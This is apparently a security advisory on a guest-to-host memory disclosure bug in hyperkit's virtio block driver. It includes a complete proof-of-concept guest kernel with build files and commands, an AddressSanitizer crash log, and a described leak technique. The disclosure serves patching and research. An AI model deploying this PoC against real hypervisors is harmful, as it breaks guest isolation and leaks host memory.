Coordinated Disclosure Timeline

Summary

A malicious guest can abuse the virtio block (disk) driver to trigger a vulnerability in the host that may disclose host memory to the virtualized guest.

Product

hyperkit

Tested Version

v0.20210107

Details

Issue 1: VBH_OP_DISCARD assertion turned into assignment (GHSL-2021-058)

The function pci_vtblk_proc handles the arrival of virtio descriptors sent by the guest. These descriptors contain disk I/O operations to be performed by the host on the disk image that contains the operating system. The operation VBH_OP_DISCARD contains a vulnerability that allows an attacker to read memory outside of the guest address space.

At pci_virtio_block.c#L316, an assertion is meant to verify the size of the incoming iov data structure. Unfortunately, a typo turns the equality operator (==) into an assignment (=). In C, an assignment expression evaluates to the value assigned, here the non-zero result of sizeof, so the assert is satisfied for any value of iov_len. As a side effect, the guest-supplied iov_len is overwritten with the expected size.

Vulnerable call:

	case VBH_OP_DISCARD:
		/* We currently limit the discard to one segment in the initial negotiation
		   so expect exactly one correctly-sized payload descriptor. */
		assert(iov[1].iov_len = sizeof(struct virtio_blk_discard_write_zeroes));
		assert(n == 2);
		vbdiscard = iov[1].iov_base;
		io->io_req.br_offset = (off_t) vbdiscard->sector * DEV_BSIZE;
		io->io_req.br_resid = vbdiscard->num_sectors * DEV_BSIZE;
		err = blockif_delete(sc->bc, &io->io_req);
		break;

Compiling hyperkit with AddressSanitizer makes the out-of-bounds access clearly visible in the following crash log.

Host crashing:

(lldb) r -s 0:0,hostbridge -s 1,uart -s 4,virtio-blk,disk.img -f multiboot,poc
Process 6867 launched: '/Users/goose/workspace/hyperkit/build/hyperkit.sym' (x86_64)
vmx_set_ctlreg: cap_field: 4 bit: 12 unspecified don't care: bit is 0
vmx_set_ctlreg: cap_field: 4 bit: 20 unspecified don't care: bit is 0
vmx_set_ctlreg: cap_field: 3 bit: 13 unspecified don't care: bit is 0
virtio-block: DISCARD op, 0x00000000 bytes, 1 segs
=================================================================
==6867==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x000114482000 at pc 0x0001000dba06 bp 0x70000d5eb3f0 sp 0x70000d5eb3e8
READ of size 4 at 0x000114482000 thread T3
    #0 0x1000dba05 in pci_vtblk_proc pci_virtio_block.c:322
    #1 0x1000da432 in pci_vtblk_notify pci_virtio_block.c:352
    #2 0x100134191 in vi_pci_write virtio.c:741
    #3 0x1000c6228 in pci_emul_io_handler pci_emul.c:364
    #4 0x100085cf5 in emulate_inout inout.c:243
    #5 0x100149b6a in vmexit_inout hyperkit.c:353
    #6 0x1001495ef in vcpu_loop hyperkit.c:631
    #7 0x1001443f2 in vcpu_thread hyperkit.c:278
    #8 0x7fff2046994f in _pthread_start+0xdf (libsystem_pthread.dylib:x86_64+0x694f)
    #9 0x7fff2046547a in thread_start+0xe (libsystem_pthread.dylib:x86_64+0x247a)

0x000114482000 is located 0 bytes to the right of 268435456-byte region [0x000104482000,0x000114482000)
allocated by thread T0 here:
    #0 0x1005d281f in wrap_valloc+0xaf (libclang_rt.asan_osx_dynamic.dylib:x86_64+0x4681f)
    #1 0x10006d8c6 in vmm_mem_alloc vmm_mem.c:49
    #2 0x1000417df in vm_malloc vmm.c:549
    #3 0x10004c645 in setup_memory_segment vmm_api.c:160
    #4 0x10004c3a9 in xh_vm_setup_memory vmm_api.c:192
    #5 0x100147372 in main hyperkit.c:1442
    #6 0x7fff20484620 in start+0x0 (libdyld.dylib:x86_64+0x15620)

Thread T3 created by T0 here:
    #0 0x1005cc4ba in wrap_pthread_create+0x5a (libclang_rt.asan_osx_dynamic.dylib:x86_64+0x404ba)
    #1 0x100143d4e in vcpu_add hyperkit.c:307
    #2 0x100147a14 in main hyperkit.c:1522
    #3 0x7fff20484620 in start+0x0 (libdyld.dylib:x86_64+0x15620)

SUMMARY: AddressSanitizer: heap-buffer-overflow pci_virtio_block.c:322 in pci_vtblk_proc
Shadow bytes around the buggy address:
  0x1000228903b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000228903c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000228903d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000228903e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x1000228903f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100022890400:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x100022890410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x100022890420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x100022890430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x100022890440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x100022890450: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa

Impact

This issue allows a guest to read memory outside its address space. To do so, a malicious guest can use the issue as an oracle: it puts the disk image into a known state and then triggers the vulnerability. The VBH_OP_DISCARD operation will use an invalid iov[1].iov_base pointer, so the virtio_blk_discard_write_zeroes structure is filled with memory beyond the guest’s address space. A carefully crafted iov_base can be chosen such that the leaked data fills the num_sectors field, thereby controlling the number of sectors zeroed out by the discard operation. The attacker can then read the disk back and count how many bytes the VBH_OP_DISCARD operation overwrote, which reveals the leaked value.

To make this attack practical (writing an unknown 32-bit number of sectors to the disk can take some time), an attacker can carefully position the virtio_blk_discard_write_zeroes structure (by changing the offset of the original iov structure) so that it is filled with the data to be leaked in smaller increments.

The impact of this vulnerability is exacerbated by the fact that, in our tests, the guest memory is allocated in a MALLOC_LARGE zone that is located right before, and is contiguous with, a MALLOC_TINY zone, which is prone to heap manipulation from the guest.

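In the following snippet, it can be seen that the iov_base pointer falls into the zone 109000000-111000000, 8 bytes before its end, so the rest of the structure is read from the adjacent MALLOC_TINY zone that starts at 111000000.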

Address of the pointer on lldb:

p iov[1].iov_base
(void *) $0 = 0x0000000110fffff8

Virtual memory map of the exploited process:

$ vmmap hyperkit
...
MALLOC_LARGE                109000000-111000000    [128.0M     4K     4K     0K] rw-/rwx SM=ALI          DefaultMallocZone_0x1003d3000
MALLOC_TINY                 111000000-111100000    [ 1024K    12K    12K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x1003d3000
VM_ALLOCATE                 111100000-111280000    [ 1536K  1176K  1176K     0K] rw-/rwx SM=PRV
MALLOC_SMALL                111800000-112000000    [ 8192K    28K    28K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x1003d3000
MALLOC_SMALL                112000000-112800000    [ 8192K    20K    20K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x1003d3000
MALLOC_LARGE                112800000-11a800000    [128.0M  4204K  4204K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x1003d3000
MALLOC_LARGE                11a800000-11a83a000    [  232K    12K    12K     0K] rw-/rwx SM=PRV          DefaultMallocZone_0x1003d3000
...

Proof of Concept

The following PoC is a simple multiboot kernel that simulates a compromised guest. The guest must be booted with the virtio-blk device enabled, for example by passing hyperkit the command-line flags -s 4,virtio-blk,disk.img.

Make sure you compile hyperkit with AddressSanitizer in order to catch the invalid read access.

To compile the PoC, follow the instructions in the Resources section.

#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static void
outw(uint16_t port, uint16_t value)
{
    __asm__ __volatile__("outw %w0,%w1"
                         :
                         : "a"(value), "Nd"(port));
}

static void
outl(uint16_t port, uint32_t value)
{
    __asm__ __volatile__("outl %0,%w1"
                         :
                         : "a"(value), "Nd"(port));
}

struct __attribute__((packed)) vring_avail
{
    uint16_t va_flags;  /* VRING_AVAIL_F_* */
    uint16_t va_idx;    /* counts to 65535, then cycles */
    uint16_t va_ring[]; /* size N, reported in QNUM value */
};

struct __attribute__((packed)) virtio_desc
{                      /* AKA vring_desc */
    uint64_t vd_addr;  /* guest physical address */
    uint32_t vd_len;   /* length of scatter/gather seg */
    uint16_t vd_flags; /* VRING_F_DESC_* */
    uint16_t vd_next;  /* next desc if F_NEXT */
};

#define VRING_DESC_F_NEXT (1 << 0)
#define VRING_DESC_F_WRITE (1 << 1)
#define VRING_DESC_F_INDIRECT (1 << 2)

#define VRING_AVAIL_F_NO_INTERRUPT 1

struct __attribute__((packed)) virtio_blk_hdr
{
#define VBH_OP_READ 0
#define VBH_OP_WRITE 1
#define VBH_OP_FLUSH 4
#define VBH_OP_FLUSH_OUT 5
#define VBH_OP_IDENT 8
#define VBH_OP_DISCARD 11
#define VBH_OP_WRITE_ZEROES 13
#define VBH_FLAG_BARRIER 0x80000000 /* OR'ed into vbh_type */
    uint32_t vbh_type;
    uint32_t vbh_ioprio;
    uint64_t vbh_sector;
};

void poc()
{
    // 0. Choose an address that is mapped but unused.
    uintptr_t pfn = (uintptr_t)0x1000000;

    // Descriptors.
    struct virtio_desc *desc = (struct virtio_desc *)(pfn);

    // First descriptor.
    struct virtio_blk_hdr *vbh = (struct virtio_blk_hdr *)0x20000;
    vbh->vbh_type = VBH_OP_DISCARD;
    vbh->vbh_ioprio = 0;
    vbh->vbh_sector = 0;

    desc[0].vd_addr = (uintptr_t)vbh; // explicit pointer-to-integer conversion
    desc[0].vd_len = sizeof(struct virtio_blk_hdr);
    desc[0].vd_next = 1;
    desc[0].vd_flags |= VRING_DESC_F_NEXT;

    // The first 8 bytes correspond to virtio_blk_discard_write_zeroes::sector
    // virtio_blk_discard_write_zeroes::num_sectors will be leaked memory
    uintptr_t addr = 0x10000000 - 8;

    // Second descriptor
    desc[1].vd_addr = addr;
    desc[1].vd_len = 0;
    desc[1].vd_next = 2;
    desc[1].vd_flags |= VRING_DESC_F_NEXT;

    // Third descriptor
    desc[2].vd_addr = 0x4000;
    desc[2].vd_len = 0x1;
    desc[2].vd_flags &= ~VRING_DESC_F_NEXT;
    desc[2].vd_flags |= VRING_DESC_F_WRITE;

    // Available descriptors.
    struct vring_avail *avail = (struct vring_avail *)(pfn + 0x800);

    avail->va_idx = 1;
    avail->va_flags |= VRING_AVAIL_F_NO_INTERRUPT;
    avail->va_ring[0] = 0;

    // 1. Select a queue.
    // VTCFG_R_QSEL = 0x0e
    outw(0x208e, 0);

    // 2. Initialize the queue to our address.
    // VTCFG_R_PFN = 0x08
    outl(0x2088, pfn / 4096);

    // 3. VTCFG_R_QNOTIFY
    outw(0x2080 | 0x10, 0);
}

int kernel_main(void)
{
    poc();
    return 0;
}

Resources

To compile the proof of concept, place the code into a C file (poc.c in the commands below) in a directory along with the provided files linker.ld and start.s. You will also need to install nasm and i686-elf-gcc:

Compilation:

# Install compilation dependencies.
brew install nasm i686-elf-gcc

# Compile the kernel into a file named `poc`.
nasm -felf32 -w+all -o start.o start.s
i686-elf-gcc -std=c17 -Wall -ffreestanding -O0 -nostdlib -Wno-unused-function -c poc.c -o poc.o
i686-elf-gcc -std=c17 -Wall -ffreestanding -O0 -nostdlib -Wno-unused-function -T linker.ld start.o poc.o -o poc -lgcc

linker.ld

ENTRY(start)
 
SECTIONS
{
    . = 1M;

    .multiboot BLOCK(4K) : ALIGN(4K)
    {
        *(.multiboot)
    }

    .text BLOCK(4K) : ALIGN(4K)
    {
        *(.text)
    }
  
    .data BLOCK(4K) : ALIGN(4K)
    {
        *(.data)
    }
 
    .rodata BLOCK(4K) : ALIGN(4K)
    {
        *(.rodata)
    }

    .bss BLOCK(4K) : ALIGN(4K)
    {
        *(.common)
        *(.bss)
    } 
}

start.s

KERNEL_STACK_SIZE equ 0x4000

[section .multiboot]
    MB_MODULEALIGN  equ  1 << 0
    MB_MEMINFO      equ  1 << 1
    MB_FLAGS        equ  MB_MODULEALIGN | MB_MEMINFO
    MB_MAGIC        equ  0x1BADB002
    MB_CHECKSUM     equ -(MB_MAGIC + MB_FLAGS)

    multiboot_header:
        dd MB_MAGIC
        dd MB_FLAGS
        dd MB_CHECKSUM

[section .text]
    start:
        global start
        lgdt [gdt_temp_r]
        mov eax, 0x10
        mov ds, ax
        mov es, ax
        mov ss, ax
        jmp 0x08:kernel_entry

    kernel_entry:
        mov esp, kernel_stack + KERNEL_STACK_SIZE
        mov ebp, esp
        extern kernel_main
        call kernel_main
        jmp $

[section .data]
    gdt_temp:
        dq 0x0000000000000000
        dq 0x00cf9a000000ffff
        dq 0x00cf92000000ffff

    gdt_temp_end:
    gdt_temp_r:
        dw gdt_temp_end - gdt_temp - 1
        dd gdt_temp

[section .bss]
    align 32
    kernel_stack:
          resb KERNEL_STACK_SIZE

CVE

Credit

This issue was discovered and reported by GHSL team member @agustingianni (Agustin Gianni).

Contact

You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2021-058 in any communication regarding this issue.